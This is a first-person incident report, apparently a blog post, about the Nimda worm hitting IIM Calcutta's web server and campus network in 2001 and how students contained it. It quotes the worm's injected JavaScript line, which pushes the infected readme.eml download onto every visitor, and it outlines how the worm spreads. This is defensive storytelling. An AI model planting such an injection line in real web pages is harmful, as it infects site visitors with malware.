November 22, 2004

When Things suddenly went wrong: w32.nimda.a@mm

The attack of the worm and the response.

This is a description of the Nimda virus attack on the official web site of Indian Institute of Management, Calcutta, on 18th September, 2001 and the subsequent response by the student system administrator team.

I was in my room, preparing for a course submission two days away, when the first alarm trickled down to me. I was struggling with a VB project, with Megadeth having sole control of my ear drums, when my neighbor Vipul, interrupted me. He was pretty incomprehensible at first, but slowly it dawned on me that I was supposed to log onto the institute web site.

As soon as I logged onto the site I knew something was wrong. We had left it safe and sound, not more than two hours ago. But now as soon as the page came up, a second window popped up and requested the download of a "readme.eml" file. I knew that eml files were used to save emails by Outlook and Outlook Express. I hoped against hope, that the eml file had something to do with my open Outlook, but very soon I was disabused.

I opened a second page on the web site, which also resulted in the pop up and download of the same "readme.eml" file. Twice was definitely no coincidence. Fighting that sinking feeling, my hope B was that the site may have been hacked or was under attack. I had to look for something, either confirming or denying this hypothesis. And the only clue I had was the eml file. Using Outlook to figure out the contents of the file showed me that there was indeed an executable file "readme.exe" as a attachment within the eml file.

The existence of the attachment caused a variety of alarms bells to go off in unison. Firstly it definitely looked like a virus, and secondly it was propagating from the web site and not via email. That morning, I had read in the morning about another variant of the 'code red' virus that was reportedly ready to start damage. Fearing the worst, my next steps were clear - I had to be at the server room physically and not in my room trying to do anything remotely. I called Vipul to join me and hurried to the main server room.

Why I was spared

Thinking back, it was pretty reckless of me to try to get to the details of the eml file in my room. But I eventually escaped infection - by nothing more than pure luck. A few days ago, my computer had been unceremoniously powered off a number of times by the Electricity corporation of West Bengal forcing me to reinstall Windows. As a result of this I ended up downgrading my Internet Explorer from the newer 5.5 version to the default 5 version that came bundled with Win98. As we will see later, the reinstall was a blessing in disguise. If this had not been the case, I would have been cleaning my own machine and saving my VB projects, instead of being free to work on just the main server.

The Server room

I was greeted at the server room by an extremely sluggish main server. This was a Compaq Proliant ML 350 running Windows NT 4. It took more than two minutes just to get to the logon screen. And all the while I could clearly see the hard drive thrashing. I was sorely tempted to switch off the machine and get it offline so that I could safely start it back up to see what damage had been done. But knowing nothing more about what was happening or the cause, I was reluctant to take any drastic measures. I continued to try to get the machine back in control.

By the time I finally got to the Shell, there was no one there. Explorer was dying intermittently and Dr.Watson (the crash recovery program on NT) was spawning all over the place. Then I found the one tool that differentiated the NT line from Windows 9x - the Task manager. Quickly I brought it up and killed off the erring Explorer and all the goody Dr.Watsons. Switching to the process list I saw dozens of processes running called - 'net'. As far as I knew, none was how many I should have seen. Meanwhile, there was no let up for the hard disk and the machine was barely responsive. In the next few minutes I slaughtered as many of the unnecessary processes as I could lay my mouse on and when I found the machine a tad quicker, sent it for a shutdown. Amidst screaming new processes the server went down.

Once I had the server down, there was a sense of peace. At least no further damage could be done. But God only knew what damage had already been done. At this point, I was still trying to convince myself that the whole thing was a hack of some kind, given the many 'net' processes and my ignorance. Yanking off the cable connecting the server I started it back in VGA mode, which was not even a safe mode, but hopefully would allow me to poke around. Dear old Explorer and Dr.Watson were up to the same antics as before. I killed each in turn and finally managed a stable Explorer as long as no one was double clicking programs.

When I finally got to the root directory and opened the default.asp file I saw that very wonderful line I would see over and over again over the next few days.

<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no, top=6000, left=6000")</script></html>

What it did was what we had seen accessing the site - it downloaded the file "readme.eml" into the computers of anyone who happened to load the page. The file "readme.eml" were of course present in the directory. A quick check showed that all the default pages each of the subdirectories were similarly changed and the "readme.eml" file was present in all of them too.

If there was a need for confirmation, this was it. It seemed less and less like a hacker and more and more like a script from a virus or a worm. And I realized that I needed to talk to someone with ideas. We were already trawling the anti-virus sites, trying to see if they had any news. Meanwhile, I went looking for help.

Trying to find help in the campus, my worst fears came true. Across the campus, computers were behaving strangely, MS Word was not saving, and some machines wouldn't even boot. The story was remarkably same everywhere.

"Oh yeah, I did double click on that readme letter, and now it keeps popping up a warning message with 'OK' 'Details>>' buttons."

"I ran a live update yesterday and Norton at the moment does not detect any viruses."

"Every time I reboot things are becoming more and more difficult.".

I main server was down, and I had no luck in finding anyone who had more experience with the server. Sometime around this time, handwritten notices were put up across the campus urging students not to click on any files that said readme or looked like a letter.

What the hell is it?

Back alone in the server room I restarted the server and this time it was tougher controlling Explorer and its buddy Dr.Watson. Finally I killed both of them and started browsing using the command shell. Then I spent time figuring out where the actual executables of the various programs in the Start menu were and started all the monitors and the mmc console that I needed. Then another crack down on the various processes that I felt were unnecessary and including the HTTP and FTP servers. Now I needed more information.

Before we continue, a quick look at the setup we have in IIM Calcutta. We have an intranet of about 400 student machines and more including those of the professors. All are connected to the Internet through two proxies - one Novell and one Linux. The (affected) Web Server is not connected to the internal network directly. Apart from the two proxies there was a third machine running Linux (Red Hat 7.1) that also had two network cards, connected both to the intranet and the Internet. This was a temporary pilot server located next to the main Web Server, and formed the hub of repair activities over the next 35 hours. Presently the machine was being used to poll the web sites of Norton and Mcafee with little information. Further searching by Vipul too yielded the same result - nothing on this, yet.

In time we assembled a team that would be responsible for the task of not only getting the main Server up but also getting the entire extranet rid of the virus. With the team came experience and more ideas. Back on the main Server, the first readme.eml was created at 6:55 p.m. This was the time when the first of the default.asp files were last modified. Vipul's call to me was about an hour later. So the web server was online for a whole hour with the virus doing whatever it was supposed to do. We also discovered that all files that were named default or index had been modified over a period of 6-7 minutes starting 6:55 p.m., pointing to the involvement of a remote script. No script run in the same machine would have taken so long. Also files not linked to from the main web site, (like indexold.asp) were also affected. All fingers now pointed to an external infection through the IIS web server similar to Code Red.

With no further word from the anti-virus sites (so we thought) and a pathetically crippled system, most of us realized that this was not going to be a quick delete, change password recovery. Also reports were trickling in that the virus was rampant across the extranet. All drives were being put on active share and machines on the network with any sort of write permissions were being promptly written into. Looking at the way the payload was working, machines needed to be isolated. Taking a quick decision all the routers in the student section were manually switched off and the student section summarily went offline.

It was already late in the night and there was still no word from the anti-virus sites. Just to be sure we got a copy of the readme.eml file and ran checks on it with all the latest anti-virus packages available. None saw anything wrong with the file, not exactly in-line with what the rest of the student machines were seeing. Then I got probably the last brain wave before my brain shut down for the period - Slashdot. And sure enough it was the third article posted a while back, with links. Now we had a name, nay two, Nimda and Minda. And things were checking out and the worst fears were out in black and white. Even though it was quite late in the night, around 2:00 a.m. and there was one update posted by McAfee and none by Symantec. Our extranet ran on Norton and so things did not look any better. We decided to keep the routers down and the site offline till further notice. Now began the damage control exercises.

Damage Control

As is the case with any other network, the first need was to assure the populace that the steps taken were not to deprive them of the network usage but to protect them. Official notices went out that detailed what had happened and what needed to be done. Also a temporary deadline of 10 a.m. was communicated before we would consider getting the network back online. There was additional control to be done. With any campus as dependant as ours on the network, communication suddenly ground to a halt. The summer placement process came to a halt. Rumors were rampant with many quotes attributed to the team handling the crisis. Most had to countered and the account put straight. Then of course we had to assure all those who were infected that things would be fine and tomorrow would be a better day.

'Tomorrow', just a few hours later, was not a better day. The Mcafee update proved to be useless. That after uninstalling Norton from a number of affected machines, installing Mcafee, updating it and running system wide scans and deleting many of the affected files.

Almost 14 hours into the attack and we hadn't made much progress. The deadline for keeping the routers down was extended to 6:00 p.m. that evening and more notices were printed. Norton was quiet and we had to wait. But in the mean time things did get better, as more and more information was available and we also got some cleaning underway. The main advantage we had was the Linux machine on the network. We could get some parts of the plan in action.

The last backups we had of the entire web site were hopelessly out of date. So we got the infected site zipped up and ftp'ed over into the Linux machine. Ditto the database. Along went copies of the readme.eml file and the readme.exe file.

Information and Modus operandi

Running strings on the executable file was very informative. the strings program basically looks through the entire file and prints out the ASCII strings embedded in it. For example if you write a program that prints "Hello World" and made it into an executable, then strings on the executable would print this string out amongst others. Some excerpts of what we found are given here. Don't worry about understanding all of it, we did not either. But this definitely gave us some clues about the way this virus worked. Most of what we found was further validated by the others in the security business. You can check the other sources out by browsing through the links below.

A quick rundown on how the virus spreads. And since no one really knew what it 'does', apart from spreading that is, we will focus this discussion on how it spreads. Most of this information was culled from the various sources available at that time and from the experience in the campus. Most of the links on this page have more information, but that does not take away from that fact that this information was crucial to us at that time.

Nimda has three methods of propagation, all of which were visible in our setup. The first is the IIS vulnerability. This is the method that was used by the Code Red too. Infected servers randomly search for other servers running IIS and they are attacked. Some attack sequences that took place in vain on our Linux server are here. After the attack the host is forced to run scripts that updates the index*.* and default*.* files on their servers with the javascript string and also copies the readme.eml into the various sub directories. With this the infection of the host is complete. Of course the worm also takes protection against detection and removal in the host machine. Once infected the IIS servers are primarily involved in infecting other servers. Our web server first attacked the Linux server at 7:56 p.m. after being infected itself at 6:55 p.m. Since neither knew about the other, and assuming the initial choice is done randomly, this is the average time for the infected server to find another one in the same IP range.

The second and third modes of transmission occur on the Client machines, after they are infected. Client machines are infected when they visit any site that has been visited by Nimda. A new popup javascript window opens that downloads and opens directly without user intervention, the readme.eml file. This auto execute feature is a security bug in IE5.5 which was what was missing in my copy of IE5 and consequently saved my machine. Once the readme.exe is executed, which may not need you to double click on it, the wily program is inside and it does take a long time to clear out. More information is available on what it does all over the Web. Click on the several links that are at the end of the page.

The second mode is mass mailing. The worm comes with its own mailing engine. It uses MAPI to find addresses and mail itself to all your contacts. The the cycle repeats itself as soon as the target machines are compromised.

The third method is infection across the local network through Microsoft file sharing. It searches for writable shared folders and dumps copies of itself into them. While this does not automatically infect the machine, curiosity to see what the file contains ends up in the machine being compromised.

The long trudge back to normalcy

Back to the story. It was after noon and there were no cleaning tools available. We had volunteers hitting the F5 refresh button every few minutes on all the major anti-virus sites. At the same time we started looking at other methods of cleaning. Earlier we had taken a zip of the entire site and moved it into the Linux machine. Now we unzipped the whole site and started seeing what needed to be done if we were to have a clean version of the site ready for install. We put together a quick script that cleaned all the download lines in the affected asp and html files. You can see the script here. Then a single statement with find, deleted all the eml files from the entire site. Followed that up with a tar -cvzf and viola we had a clean version of the site to deploy - only no web server.

Our prayers were soon to be answered. Symantec did come out with the update, and we were back in action, on the main server. Hours of downloads and reinstallation of Norton anti-virus revealed that most of the new-found enthusiasm was in error. The patches for Code Red were not properly installed and there were other updates to be done before the cleaning was to succeed. The next few hours was spent in cycles of search/locate/download-into-linux-server/ftp-to-main-server/patch-and-update.

In the mean time we used the machine which had a controlled copy of the worm to cause infection and then clean with the anti-virus. This confirmed that the update might indeed work on workstations, though at that time it was highly ineffective on servers. Also our 6:00 p.m. deadline was upon us and we had to stretch it over to 10:00 p.m. that night. But now we had the anti-virus and also information on the propagation of the virus. Notices went out on the need to disable all file sharing from students' computers, infected or otherwise. Also a step-by-step drill was developed to be followed by all users at 10:00 p.m., when the network came back online. Notices went up and leaflets were distributed. Volunteers went out armed with three diskettes containing the updates, to all the critical computer installations in the campus to clean and secure them before the 10:00 p.m. deadline.

The struggle in the server room was in full swing. By the time most of the patches were in place (there was one we missed and would now know until much later) the server must have rebooted a billion times. Finally the virus scan was in place and we realized how lucky we were to have created a clean copy of the site ready for deployment. Norton was deleting all the files that it could not clean, and that included most of the startup pages in the web site, and all of its sections. Letting the scan run completely, and many times we were quite sure that we were clean.

The 10:00 p.m. deadline came and the routers went online. The net-starved IIM Calcutta community immediately came online. To make it easy for the users, and also to provide an alternative till the main web server came up, the Linux box mirrored all the updates, and information about the drill to clean infected computers.

The day crossed over into the next, and at 12:00 a.m. the site zip was in place and file copy was in progress. By around 1:00 a.m. the site tentatively came live, minus the cable connecting it to the network. after browsing a while and making sure that the site was indeed the way it was supposed to be, we went live.

By 2:00 a.m. we were back offline and deleting the admin.dll that had tftp'ed itself into the temp folder. Frantic searching located the missing patch. Patch-rinse-repeat. Now the server did hold but we did not have the energy to keep monitoring it or the guts to keep it online without supervision. So the server went back offline and we went to bed.

The next morning arrived without me in the server room. I was back with Megadeth at full blast trying to complete my Project in time that suddenly had 40 fewer hours to the deadline. But the news was that the freshly patched server was holding up and doing well. Of course a number of client machines are still infected and need to be cleaned. But so far we have not had a single report of late or cross infection.

(We got a 12 hour extension on the project submission and mine did go well in time. Thanks for asking anyway)

Related links

Symantec
Mcafee
Trend Micro Update
F-Secure virus definitions
Symantec Removal Tool
CERT Advisorywith a number of other links too.
Another Fight The TechRepublic battles

Document Changes
November 22, 2004: Essential rewrite of article stressing the central idea and new links too.
April 02, 2009: Updates and corrections.

No comments: